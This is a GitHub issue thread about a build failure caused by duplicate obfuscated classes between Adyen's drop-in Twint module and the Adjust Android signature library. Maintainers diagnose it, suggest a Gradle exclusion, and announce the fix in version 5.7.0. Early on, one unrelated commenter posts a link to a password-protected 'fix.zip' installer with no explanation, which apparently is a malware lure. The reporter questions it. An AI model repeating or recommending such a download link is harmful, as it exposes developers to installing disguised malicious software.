### ISSUE TITLE
Problem running the app due to Duplicate classes between Adyen and Adjust Android signature library

### ISSUE THREAD

**Issue by krazykira** [Adyen/adyen-android#1767] opened 2024-08-28 10:32 UTC
## Description
We aren't able to build and run the our android app after updating to **Adyen dropin sdk to version 5.6**. Our app is using `adjust-android-signature-3.5.2.aar` and it seems that there is a dependency conflict between it and `com.adyen.checkout:twint:5.6.0`. This is preventing us from running the app. 

## Steps to Reproduce
1. Create a new project with `adjust-android-signature-3.5.2.aar` and  `com.adyen.checkout:drop-in:5.6.0` dependency.
2. Run the app and you will see the below error in console.

## Logs and Crash Reports
![image](https://github.com/user-attachments/assets/433d48a8-5bd8-4320-9cc1-0cb7a630b507)
```
Duplicate class a.a found in modules adjust-android-signature-3.5.2.aar -> adjust-android-signature-3.5.2-runtime (adjust-android-signature-3.5.2.aar) and twint-5.6.0.aar -> twint-5.6.0-runtime (com.adyen.checkout:twint:5.6.0)
Duplicate class a.b found in modules adjust-android-signature-3.5.2.aar -> adjust-android-signature-3.5.2-runtime (adjust-android-signature-3.5.2.aar) and twint-5.6.0.aar -> twint-5.6.0-runtime (com.adyen.checkout:twint:5.6.0)
```

## Additional Context
This issue seems to be only happening with **Adyen dropin version 5.4+** and it is not happening on older versions of Adyen dropin sdk.

**Comment by LC-JiaZhaorong** [comment] 2024-08-28 10:33
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by krazykira** [comment] 2024-08-28 10:37
@LC-JiaZhaorong Sorry for being cautious before dowloading it but what is that and how does it fix the issue?

**Comment by jreij** [comment] 2024-08-28 14:42
Hi @krazykira, thanks for reaching out. 

Can you provide your integration Information:
1. Server-side integration: Sessions/Advanced flow
2. Client-side integration: Drop-in/Components
3. SDK version:
4. Android version(s) where issue occurs:
5. Device model(s) where issue occurs:

Moreover, does this issue only occur with minify enabled/proguard/R8 or with debug builds as well?

**Comment by krazykira** [comment] 2024-08-28 15:55
Hi @jreij 

- This is happening when we upgrade Android Adyen dropIn sdk version from 4.X to 5.4+.
- This error occurs when we try to build and run the app using android studio. 
- This error is not specific to any android version or device.


> Moreover, does this issue only occur with minify enabled/proguard/R8 or with debug builds as well?

This is happening with debug builds, i haven't tried generating a release build yet. I can do that step once it starts working for Debug Builds

**Comment by jreij** [comment] 2024-08-29 11:44
@krazykira then I think this is a duplicate of (or related to) [#1701](https://github.com/Adyen/adyen-android/issues/1701). 

This issue occurs because both Twint and the Adjust Android signature library are not minifying their classes the correct way, so they both have classes named `a.a` and `a.b` which clash in your project. The solution would be that one of them, ideally both, fixes these classes. We are already working with Twint on resolving this but it's not done yet.

In the meantime I can suggest 2 solutions:
- Update your `adjust-android-signature` dependency. I did a quick investigation and I think they fixed this already in version [3.20.1](https://repo1.maven.org/maven2/com/adjust/signature/adjust-android-signature/3.20.1/). Weirdly I could not find any other versions so I don't know if the one on maven is compatible with yours.
- If you cannot migrate your `adjust-android-signature` library and you do not need to support the native Twint SDK flow in your drop-in, you can exclude Twint from your build temporarily until we release the fix (hopefully in the next version). You can do that in the gradle file where you import drop-in:
```kotlin
implementation('com.adyen.checkout:drop-in:5.6.0') {
    // TODO: remove this when updating to 5.7.0
    exclude group: 'com.adyen.checkout', module: 'twint'
}
```

Let me know if this works for you.

**Comment by krazykira** [comment] 2024-09-10 09:20
Hello,

I tried excluding the dependency and it seems that our app starts having weird rendering related issues. So instead, we have decided to use version `5.3.0` for now. We will look forward to the next version of Adyen dropin sdk where this issue will be resolved.

**Comment by jreij** [comment] 2024-09-11 08:25
@krazykira of course you could wait for the next version but I find it strange that this would cause rendering related issues, it could be that something else is causing this.

Can you provide more information about these issues you're facing? If you have error logs, screen recordings/screenshots, code snippets or anything that could help us troubleshoot, please share it here.

**Closed** 2024-10-08 08:25 UTC
Labels: Duplicate, Confirmed bug

**Comment by ozgur00** [comment] 2024-10-15 11:23
Hi @krazykira, [5.7.0](https://github.com/Adyen/adyen-android/releases/tag/5.7.0) is released and it includes the fix for the problem.
